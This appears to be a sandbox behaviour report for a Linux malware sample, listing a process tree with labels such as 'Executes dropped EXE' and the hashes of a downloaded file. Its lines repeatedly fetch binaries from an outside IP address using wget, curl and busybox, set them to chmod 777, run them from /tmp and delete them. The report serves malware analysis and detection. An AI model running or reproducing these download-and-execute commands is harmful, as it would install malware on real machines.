- Executes dropped EXE
PID:946
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:950
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:956
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:962
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:968
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:974
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:980
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:983
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:984
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:986
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:989
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:990
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:992
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:995
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97